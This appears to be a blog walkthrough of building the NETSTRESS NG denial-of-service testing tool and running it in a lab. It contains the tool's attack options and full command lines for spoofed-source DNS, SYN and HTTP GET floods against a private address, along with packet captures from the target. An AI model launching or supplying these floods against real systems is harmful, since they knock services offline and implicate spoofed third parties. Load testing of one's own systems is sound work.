about netstress NG
In short, netstress is DoS testing tool.
You can generate SYN flood, UDP flood, HTTP flood, DNS flood etc.
Please note that netstress source code seems to be for 32bit OS.
In my case, I can’t build netstress on 64bit OS.
# tail -1 /etc/lsb-release ;uname –ri
DISTRIB_DESCRIPTION="Ubuntu 12.04.3 LTS"
3.8.0-34-generic i386
|
install libcurses packages which are required to build netstress ng.
# apt-get install libncurses5 libncurses5-dev
|
build netstress
# tar xzvf netstress-3.0.7.tar.gz
# cd netstress-3.0.7/
# make menuconfig
# make
# sh compile_all.sh
# ./netstress.ful
lrandom --help
Metin KAYA <kayameti@gmail.com> from EnderUNIX SDT [http://www.EnderUNIX.org]
NETSTRESS a.k.a SALDIRAY v3.0.7
--saddr, -s: source address
--sport, -p: source port
--daddr, -d: destination address
--dport, -P: destination port
--file, -f: the full path for the file of dns server list for ampdns flood
--attack, -a: type of attack (ack, syn, fin, udp, dns, ampdns, igmp, winbomb, win98,
get, post, syncook, isssyn)
--process, -n: number of processes
--buffer, -b: size of UDP packet
--dnsqname, -N: hostname which will be queried
--dnsqtype, -t: type of dns query (a, ns, cname, soa, wks, ptr, hinfo, minfo, mx, txt)
--useragent, -u: user agent parameter for http get flood
--help, -h: shows this message
|
let’s use netstress
DNS attack
# ./netstress.fullrandom -d 192.168.100.100 -P 53 -a dns -n 1 -t a
|
cap date collected on the target server
sending random A queries from spoofed source IP addresses.
# tshark -r a.pcap -R '(udp.port==53)' | head -10
Running as user "root" and group "root". This could be dangerous.
1 0.000000000 192.168.100.100 -> 139.230.11.100 DNS 149 Standard query response 0xaa17 No such name
2 0.000013000 192.168.100.100 -> 39.65.243.34 DNS 148 Standard query response 0x7517 No such name
3 0.000025000 192.168.100.100 -> 41.147.253.72 DNS 148 Standard query response 0xd317 No such name
4 0.000037000 192.168.100.100 -> 25.247.251.34 DNS 149 Standard query response 0xaf17 No such name
5 0.000045000 192.42.93.30 -> 192.168.100.100 DNS 151 Standard query response 0x2838 No such name
6 0.000048000 192.35.51.30 -> 192.168.100.100 DNS 151 Standard query response 0xe243 No such name
7 0.000050000 79.217.7.43 -> 192.168.100.100 DNS 76 Standard query 0xf517 A mk1330537033.net
8 0.000053000 192.42.93.30 -> 192.168.100.100 DNS 152 Standard query response 0xda7e No such name
9 0.000055000 192.42.93.30 -> 192.168.100.100 DNS 151 Standard query response 0xad4d No such name
10 0.000057000 221.158.6.41 -> 192.168.100.100 DNS 75 Standard query 0xa117 A mk619198569.net
|
syn flood
# ./netstress.fullrandom -d 192.168.100.100 -P 80 -a syn -n 1
|
HTTP GET flood
# ./netstress.fullrandom -d 192.168.100.100 -P 80 -a get -n 1 -u test
|
cap data
Hypertext Transfer Protocol
GET /334049107 HTTP/1.1\r\n
[Expert Info (Chat/Sequence): GET /334049107 HTTP/1.1\r\n]
[Message: GET /334049107 HTTP/1.1\r\n]
[Severity level: Chat]
[Group: Sequence]
Request Method: GET
Request URI: /334049107
Request Version: HTTP/1.1
User-Agent: test\r\n
Host: 127.0.0.1:80\r\n
Connection: keep-alive\r\n
\r\n
[Full request URI: http://127.0.0.1:80/334049107]
|
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.